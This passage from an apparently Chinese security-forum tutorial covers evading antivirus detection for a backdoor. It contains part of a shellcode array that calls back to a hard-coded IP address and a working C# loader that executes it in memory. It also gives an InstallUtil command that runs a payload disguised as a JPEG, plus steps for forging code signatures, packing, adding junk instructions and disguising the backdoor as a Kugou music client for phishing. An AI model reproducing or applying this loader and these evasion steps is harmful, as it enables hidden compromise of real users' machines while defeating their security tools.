0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x34, 0x37, 0x2e, 0x31, 0x31, 0x33, 0x2e, 0x32, 0x31, 0x37, 0x2e, 0x31, 0x32, 0x38, 0x00, 0x12, 0x34, 0x56, 0x78 };//生成的shellcode UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); [DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName ); [DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName ); [DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName ); [DllImport("kernel32")] private static extern UInt32 GetLastError(); } ``` 这里生成jpg格式的图片,虽说我们进行查杀时,某绒会检测到,但不会自动进行处理,但生成exe的话就会被自动处理,因为为jpg格式,默认无危害,就好比我们web安全上传jpg图片时就算添加了恶意代码但默认没有危害,如果配合文件解析漏洞的话那么就能达到我们想要的目的,而这里的白名单技术正是利用了该原理 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7429fc38798d08c0f26559d2eb3667d8baa5b3da.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7429fc38798d08c0f26559d2eb3667d8baa5b3da.png) `InstallUtil /logfile= /LogToConsole=false /U d:\mksec.jpg` //加载执行成功上线,过某绒,这个我并未上传去vt上,因为没有多大意义,可能多数杀毒软件能够检测到但这主要是观察执行的过程时会不会被阻止。 数字签名 ---- 数字签名相信大家并不陌生,在多数产商开发的程序中都会加上数字签名,其实更多的是产商和某些杀毒软件达成了协议,只要是加上了这个公司的数字签名默认就不会被查杀,使用签名伪造工具,将正常软件的签名信息加入到自己软件中,当然如果你能够盗取到真实的数字签名的话那免杀效果肯定很好,一般我们只能自己利用工具伪造。 使用K8数字签名添加器进行签名伪造,选择第一开始C#生成的exe添加签名 K8数字签名添加器链接:<https://pan.baidu.com/s/1zkI6Cceny-0Clhi1RvHdeQ> 提取码:oyzt [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bab79af0276692b4836d57ecb0e9531d10a21d1f.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bab79af0276692b4836d57ecb0e9531d10a21d1f.png) 此时可以看到添加签名成功 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e39f8066bbfc342aff1e2388d8f0da033d487732.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e39f8066bbfc342aff1e2388d8f0da033d487732.png) 未添加签名的免杀率为31/67,添加后为27/67,说明数字签名还是有点效果的 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0ad664938e14f6de7b13a27e70092ed78e8f57d4.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0ad664938e14f6de7b13a27e70092ed78e8f57d4.png) 后门加壳 ---- 当我们运行这个加壳的程序时,系统首先会运行程序的“壳”,然后由壳将加密的程序逐步还原到内存中,最后运行程序。这样一来,在我们看来,似乎加壳之后的程序并没有什么变化,然而它却达到了加密的目的,从而绕过某些杀毒软件的查杀,这就是壳的作用,加壳的软件非常多,这里随便选择两种。 这里选择第一开始C生成的后门进行加壳 VMProtect Ultimate对后门加壳 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-73aba91441cff052de9a73cace96dbda38a26bed.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-73aba91441cff052de9a73cace96dbda38a26bed.png) 选择添加,后面根据自己的需要进行选择,非常简单不多介绍 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f7eb957bb392a1c10f2926559bc9075a9d048f29.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f7eb957bb392a1c10f2926559bc9075a9d048f29.png) 未加壳的免杀率为37/67,加壳后为32/66 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b5bb1169bbdd6953701a659707814b7b797e81eb.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b5bb1169bbdd6953701a659707814b7b797e81eb.png) 使用UPX进行加壳 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-05caebeb2b7ee9c331f25972f64b4ea43683c718.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-05caebeb2b7ee9c331f25972f64b4ea43683c718.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9918ccde78346d8e442ca63fa493361975d983f8.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9918ccde78346d8e442ca63fa493361975d983f8.png) 加壳的软件也非常多,也可以使用两个软件进行加壳,但前提是要能够运行。 添加花指令 ----- 花指令其实就是一段毫无意义的指令,也可以称之为垃圾指令。花指令是否存在对程序的执行结果没有影响,所以它存在的唯一目的就是阻止反汇编程序,或对反汇编设置障碍。大多数反病毒软件是靠特征码来判断文件是否有毒的,而为了提高精度,现在的特征码都是在一定偏移量限制之内的,否则会对反病毒软件的效率产生严重的影响!而在黑客们为一个程序添加一段花指令之后,程序的部分偏移会受到影响,如果反病毒软件不能识别这段花指令,那么它检测特征码的偏移量会整体位移一段位置,自然也就无法正常检测木马了。 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5db5a9b2e4cfe6a3a02e1dbb2df821948d520fb0.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5db5a9b2e4cfe6a3a02e1dbb2df821948d520fb0.png) 特征码定位汇编修改 --------- 在上面的shellcode脚本进行确定定位特征码时,我们并未利用工具,但是对exe进行特征码定位时就需要利用工具。说实话我只会定位exe程序的特征码,但是并不知道该怎么修改,因为这毕竟是汇编的知识,没有学,我也尝试了很多网上的资料,但都没成功,生成的后门都不能运行。 这里分块数量选择10,意思就是以10个分块去处理后门 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a7651577f1f7a228e29c35723103fa2915b386f4.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a7651577f1f7a228e29c35723103fa2915b386f4.png) 后门成功被分成了10个分块,此时使用某绒进行查杀,并处理 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ef8e6f86fe0879edecf878909b2fc7bc9af60f17.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ef8e6f86fe0879edecf878909b2fc7bc9af60f17.png) 点击二次处理和特征区间后继续查杀 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-875a918edec6f349f38ce1bd56c9b83b72f0e942.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-875a918edec6f349f38ce1bd56c9b83b72f0e942.png) 分块数量到达1、2、3就可以了 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1d5aa007606de8240017cee3755dec0e98a8f113.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1d5aa007606de8240017cee3755dec0e98a8f113.png) 使用汇编软件定位到特征码 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6c3b6fbfc153518f12b482f7073f0057ff145280.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6c3b6fbfc153518f12b482f7073f0057ff145280.png) 进入汇编模式,此时我就不会改了,压根都不懂,所以这里需要会汇编的大佬来,但我看很多文章有介绍汇编的免杀效果很好 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f42d5edb6d3aff5e30040e9d854d8819ae8a9ec0.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f42d5edb6d3aff5e30040e9d854d8819ae8a9ec0.png) 资源修改 ---- 通过修改执行文件的资源文件伪造正规文件达到欺骗,如版权信息,数字签名,位图图标等,有些杀软会设置有扫描白名单。 下载酷狗音乐,直接拖进去 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7c81e50124c31f11636db7b9e6ec86c62e6e89b3.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7c81e50124c31f11636db7b9e6ec86c62e6e89b3.png) 选择导出全部资源 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c863b64bc154835ab99f2732b115f000e8b86c33.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c863b64bc154835ab99f2732b115f000e8b86c33.png) 将第一开始C语言生成的后门也拖进去,然后将对应的kugou的资源放置project3.exe中 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-14805680eaf243e452467caf020cb771b874aa70.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-14805680eaf243e452467caf020cb771b874aa70.png) 全部添加成功后,删除kuogou10024.exe,点击保存 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-870f2dcd1f53f2402c8025cc7e948fd4304305a0.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-870f2dcd1f53f2402c8025cc7e948fd4304305a0.png) 点击保存你可以发现和kougou的界面一模一样,该方法也经常用于钓鱼 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-53a2d3acb37b3a77986bf7d2d71316f431de0733.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-53a2d3acb37b3a77986bf7d2d71316f431de0733.png) 未加壳的免杀率为37/67,加壳后为31/67 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1007405b4384a129b9e9c5fe8b6f40df4898c6c4.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1007405b4384a129b9e9c5fe8b6f40df4898c6c4.png) 总结 -- 上述主要从以下方面进行了免杀分析,也将绝大多数的免杀方式写完了 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-238d89c9c692758c397cf813f615a6992ef73040.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-238d89c9c692758c397cf813f615a6992ef73040.png) 通过以上的分析我们要能够学到什么?其实并不是说自己能够复现一遍就行,因为免杀只是暂时的,公布出来很快就会被列入指纹库,我们需要做的是要能够清楚的知道上面的免杀方式,能够将多种免杀思路进行结合,好比在web攻击中cors+xss打组合拳一样来提升危害,通过上面的配合如混淆加密后还不能免杀那就添加花指令、数字签名等等,而且每一种方式的思路都不止一种,这样就相当于排列组合,免杀的思路就非常多了,喜欢的话给我点个关注吧。
发表于 2021-12-15 09:58:07
阅读 ( 12911 )
分类:
内网渗透
5 推荐
收藏
0 条评论
请先
登录
后评论
Honeypot
17 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!